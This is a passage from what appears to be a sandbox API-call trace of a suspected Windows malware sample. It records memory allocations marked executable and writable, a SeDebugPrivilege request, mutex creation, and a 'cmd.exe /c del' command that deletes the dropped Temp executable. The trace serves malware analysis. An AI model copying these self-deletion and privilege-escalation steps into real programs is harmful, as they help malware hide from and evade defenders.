ZeroBits=0x0, RegionSize=0xdf244*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xdf240*=0x66d0000, RegionSize=0xdf244*=0x2fa000) returned 0x0 [0110.417] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5815b8 [0110.417] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5825c0 [0110.422] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5835c8 [0110.422] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x5845d0 [0110.423] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5835c8) returned 1 [0110.423] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x5865d8 [0110.424] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5845d0) returned 1 [0110.424] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x5895e0 [0110.425] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5865d8) returned 1 [0110.425] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x5835c8 [0110.426] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5895e0) returned 1 [0110.426] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5885d0 [0110.426] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x5895d8 [0110.426] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5885d0) returned 1 [0110.426] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x58b5e0 [0110.427] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5895d8) returned 1 [0110.427] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x58e5e8 [0110.428] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58b5e0) returned 1 [0110.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x5885d0 [0110.428] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58e5e8) returned 1 [0110.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x58d5d8 [0110.428] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x58e5e0 [0110.429] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58d5d8) returned 1 [0110.429] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x5905e8 [0110.429] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58e5e0) returned 1 [0110.429] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x5935f0 [0110.430] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5905e8) returned 1 [0110.430] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x58d5d8 [0110.431] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5935f0) returned 1 [0110.432] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5815b8) returned 1 [0110.432] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5825c0) returned 1 [0110.433] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5835c8) returned 1 [0110.434] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5885d0) returned 1 [0110.436] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58d5d8) returned 1 [0110.460] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5815b8 [0110.461] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5825c0 [0110.461] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5835c8 [0110.461] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x5845d0 [0110.462] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5835c8) returned 1 [0110.462] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x5865d8 [0110.462] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5845d0) returned 1 [0110.462] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x5895e0 [0110.463] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5865d8) returned 1 [0110.464] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x5835c8 [0110.465] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5895e0) returned 1 [0110.465] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x5885d0 [0110.466] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x5895d8 [0110.466] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5885d0) returned 1 [0110.467] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x58b5e0 [0110.468] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5895d8) returned 1 [0110.468] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x58e5e8 [0110.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58b5e0) returned 1 [0110.469] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x5885d0 [0110.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58e5e8) returned 1 [0110.469] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x58d5d8 [0110.469] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x58e5e0 [0110.469] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58d5d8) returned 1 [0110.470] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3000) returned 0x5905e8 [0110.470] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58e5e0) returned 1 [0110.470] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x5935f0 [0110.471] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5905e8) returned 1 [0110.471] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5000) returned 0x58d5d8 [0110.471] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5935f0) returned 1 [0110.472] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5815b8) returned 1 [0110.472] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5825c0) returned 1 [0110.473] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5835c8) returned 1 [0110.476] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5885d0) returned 1 [0110.477] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x58d5d8) returned 1 [0110.481] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.481] NtCreateFile (in: FileHandle=0xdf20c, DesiredAccess=0x120089, ObjectAttributes=0xdf1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf20c*=0x158, IoStatusBlock=0xdf1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0110.482] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x57a920) returned 1 [0110.482] NtQueryInformationFile (in: FileHandle=0x158, IoStatusBlock=0xdf1f4, FileInformation=0xdef68, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdf1f4, FileInformation=0xdef68) returned 0x0 [0110.482] NtClose (Handle=0x158) returned 0x0 [0110.482] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x208) returned 0x5815b8 [0110.483] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5815b8) returned 1 [0110.491] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x5fa311d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0xdf228, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0xdf228*(BaseAddress=0x5fa31000, AllocationBase=0x5fa30000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0111.219] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0xdf280, Length=0x2, ResultLength=0x0 | out: SystemInformation=0xdf280, ResultLength=0x0) returned 0x0 [0111.237] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0xdf2a4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdf2a4, ReturnLength=0x0) returned 0x0 [0111.273] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0xf5d020) returned 1 [0111.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef34*=0x0, ZeroBits=0x0, RegionSize=0xdef38*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef34*=0x540000, RegionSize=0xdef38*=0x10000) returned 0x0 [0111.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x540000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x540000, ResultLength=0x0) returned 0xc0000004 [0111.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x540000, RegionSize=0xdef58, FreeType=0x8000) returned 0x0 [0111.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef20*=0x0, ZeroBits=0x0, RegionSize=0xdef24*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef20*=0x540000, RegionSize=0xdef24*=0x20000) returned 0x0 [0111.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x540000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x540000, ResultLength=0x0) returned 0x0 [0111.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x540000, RegionSize=0xdf298, FreeType=0x8000) returned 0x0 [0111.404] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdf050 | out: Value="RDhJ0CNFevzX") returned 0x0 [0111.446] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdf2ac | out: TokenHandle=0xdf2ac*=0x158) returned 0x0 [0111.450] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdf2a0 | out: lpLuid=0xdf2a0*(LowPart=0x14, HighPart=0)) returned 1 [0111.465] NtAdjustPrivilegesToken (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xdf29c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0111.486] NtClose (Handle=0x158) returned 0x0 [0111.486] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdedf4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0111.486] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="6NON26-3", Value=0xdf08c | out: Value=0xdf08c) returned 0xc0000100 [0111.486] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdebd4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0111.490] NtOpenDirectoryObject (in: FileHandle=0xdee80, DesiredAccess=0x2000f, ObjectAttributes=0xdee4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee80*=0x158) returned 0x0 [0111.493] NtCreateMutant (in: MutantHandle=0xdf0ac, DesiredAccess=0x1f0001, ObjectAttributes=0xdee34*(Length=0x18, RootDirectory=0x158, ObjectName="6NON26-3X60UXYXz", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0ac*=0x178) returned 0x0 [0111.494] NtClose (Handle=0x158) returned 0x0 [0111.494] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdeab4 | out: Value="RDhJ0CNFevzX") returned 0x0 [0111.494] NtOpenDirectoryObject (in: FileHandle=0xdee78, DesiredAccess=0x2000f, ObjectAttributes=0xdee44*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee78*=0x158) returned 0x0 [0111.494] NtCreateMutant (in: MutantHandle=0xdf0a4, DesiredAccess=0x1f0001, ObjectAttributes=0xdee2c*(Length=0x18, RootDirectory=0x158, ObjectName="-2NP6R7E2SEYA12z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0a4*=0x17c) returned 0x0 [0111.494] NtClose (Handle=0x158) returned 0x0 [0111.502] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x582e38 [0111.502] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x583e40 [0111.502] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x584e48 [0111.506] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xdecbc | out: Value="C:\\Program Files (x86)") returned 0x0 [0111.506] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xdece8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0111.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\rysgtozci.exe", NtPathName=0xdec94, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\rysgtozci.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0111.520] NtCreateFile (in: FileHandle=0xdecb4, DesiredAccess=0x120089, ObjectAttributes=0xdec7c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Temp\\rysgtozci.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdec9c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdecb4*=0x0, IoStatusBlock=0xdec9c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0111.529] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x577708) returned 1 [0111.529] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", NtPathName=0xdf064, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0111.530] NtCreateFile (in: FileHandle=0xdf084, DesiredAccess=0x120089, ObjectAttributes=0xdf04c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf06c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf084*=0x158, IoStatusBlock=0xdf06c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0111.531] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5770b8) returned 1 [0111.537] NtQueryInformationFile (in: FileHandle=0x158, IoStatusBlock=0xdf06c, FileInformation=0xdefc4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf06c, FileInformation=0xdefc4) returned 0x0 [0111.537] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1a00) returned 0x585e50 [0111.544] NtReadFile (in: FileHandle=0x158, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf06c, Buffer=0x585e50, BufferLength=0x1600, ByteOffset=0xdefdc*=0, Key=0x0 | out: IoStatusBlock=0xdf06c, Buffer=0x585e50*) returned 0x0 [0111.545] NtClose (Handle=0x158) returned 0x0 [0111.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", NtPathName=0xdf054, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0111.546] NtCreateFile (in: FileHandle=0xdf074, DesiredAccess=0x120089, ObjectAttributes=0xdf03c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf05c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf074*=0x158, IoStatusBlock=0xdf05c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0111.547] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5770b8) returned 1 [0111.547] NtQueryInformationFile (in: FileHandle=0x158, IoStatusBlock=0xdf05c, FileInformation=0xdefb4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf05c, FileInformation=0xdefb4) returned 0x0 [0111.547] NtClose (Handle=0x158) returned 0x0 [0111.549] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xde554, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0111.549] NtCreateFile (in: FileHandle=0xde574, DesiredAccess=0x120089, ObjectAttributes=0xde53c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde55c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde574*=0x158, IoStatusBlock=0xde55c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0111.549] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5770b8) returned 1 [0111.549] NtQueryInformationFile (in: FileHandle=0x158, IoStatusBlock=0xde55c, FileInformation=0xde2d0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xde55c, FileInformation=0xde2d0) returned 0x0 [0111.549] NtClose (Handle=0x158) returned 0x0 [0111.549] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x208) returned 0x581940 [0111.550] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x581940) returned 1 [0111.553] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xdec24*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdec68, hNewToken=0x0 | out: lpProcessInformation=0xdec68*(hProcess=0x180, hThread=0x158, dwProcessId=0xcb0, dwThreadId=0xc60), hNewToken=0x0) returned 1 [0112.288] NtWaitForSingleObject (Object=0x180, Alertable=0, Time=0x0) returned 0x0 [0115.366] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde940 | out: Value="C:\\Program Files (x86)") returned 0x0 [0115.402] SetErrorMode (uMode=0x8003) returned 0x1 [0115.405] NtCreateSection (in: SectionHandle=0xdeccc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xdea48, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdeccc*=0x188) returned 0x0 [0115.409] NtMapViewOfSection (in: SectionHandle=0x188, ProcessHandle=0xffffffff, BaseAddress=0xdecd0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea48*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xdecd0*=0x540000, SectionOffset=0x0, ViewSize=0xdea48*=0x2f000) returned 0x0 [0115.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea40*=0x0, ZeroBits=0x0, RegionSize=0xdea44*=0x2e200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xdea40*=0xec0000, RegionSize=0xdea44*=0x2f000) returned 0x0 [0115.419] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2000) returned 0x587858 [0115.419] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde784 | out: TokenHandle=0xde784*=0x184) returned 0x0 [0115.424] NtQueryInformationToken (in: TokenHandle=0x184, TokenInformationClass=0x1, TokenInformation=0xddf7c, TokenInformationLength=0x400, ReturnLength=0xde77c | out: TokenInformation=0xddf7c, ReturnLength=0xde77c) returned 0x0 [0115.425] ConvertSidToStringSidW (in: Sid=0xddf84*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde780 | out: StringSid=0xde780*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0115.425] NtClose (Handle=0x184) returned 0x0 [0115.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9f4*=0x0, ZeroBits=0x0, RegionSize=0xde9f8*=0x92f56, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9f4*=0xef0000, RegionSize=0xde9f8*=0x93000) returned 0x0 [0115.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xde9e0*=0x0, ZeroBits=0x0, RegionSize=0xde9e4*=0x92f56, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xde9e0*=0xf90000, RegionSize=0xde9e4*=0x93000) returned 0x0 [0115.444] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x587858) returned 1 [0115.445] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1000) returned 0x587858 [0115.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0115.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0115.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0115.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0115.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0115.486] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde108 | out: Value="RDhJ0CNFevzX") returned 0x0 [0115.487] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde474 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0115.487] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde48c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0115.487] NtCreateSection (in: SectionHandle=0xdfabc, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde4c4, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xdfabc*=0x184) returned 0x0 [0115.487] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0xffffffff, BaseAddress=0xdfab8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde4c4*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdfab8*=0x69d0000, SectionOffset=0x0, ViewSize=0xde4c4*=0x9c4000) returned 0x0 [0115.488] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x588860 [0115.488] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xddc28 | out: TokenHandle=0xddc28*=0x194) returned 0x0 [0115.488] NtQueryInformationToken (in: TokenHandle=0x194, TokenInformationClass=0x1, TokenInformation=0xdd420, TokenInformationLength=0x400, ReturnLength=0xddc20 | out: TokenInformation=0xdd420, ReturnLength=0xddc20) returned 0x0 [0115.488] ConvertSidToStringSidW (in: Sid=0xdd428*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddc24 | out: StringSid=0xddc24*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0115.488] NtClose (Handle=0x194) returned 0x0 [0115.499] RtlIntegerToChar (in: Value=0x88c53315, Base=0x10, Length=0x20, String=0x69d649d | out: String="88C53315") returned 0x0 [0115.502] NtCreateKey (in: KeyHandle=0xde69c, DesiredAccess=0x20219, ObjectAttributes=0xddc28*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde69c*=0x194) returned 0x0 [0115.511] NtQueryValueKey (in: KeyHandle=0x194, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0xde274, Length=0x100, ResultLength=0xde6f0 | out: KeyValueInformation=0xde274*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1e, NameLength=0x16, Name="ProductName", Data="Windows 10 Pro"), ResultLength=0xde6f0) returned 0x0 [0115.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 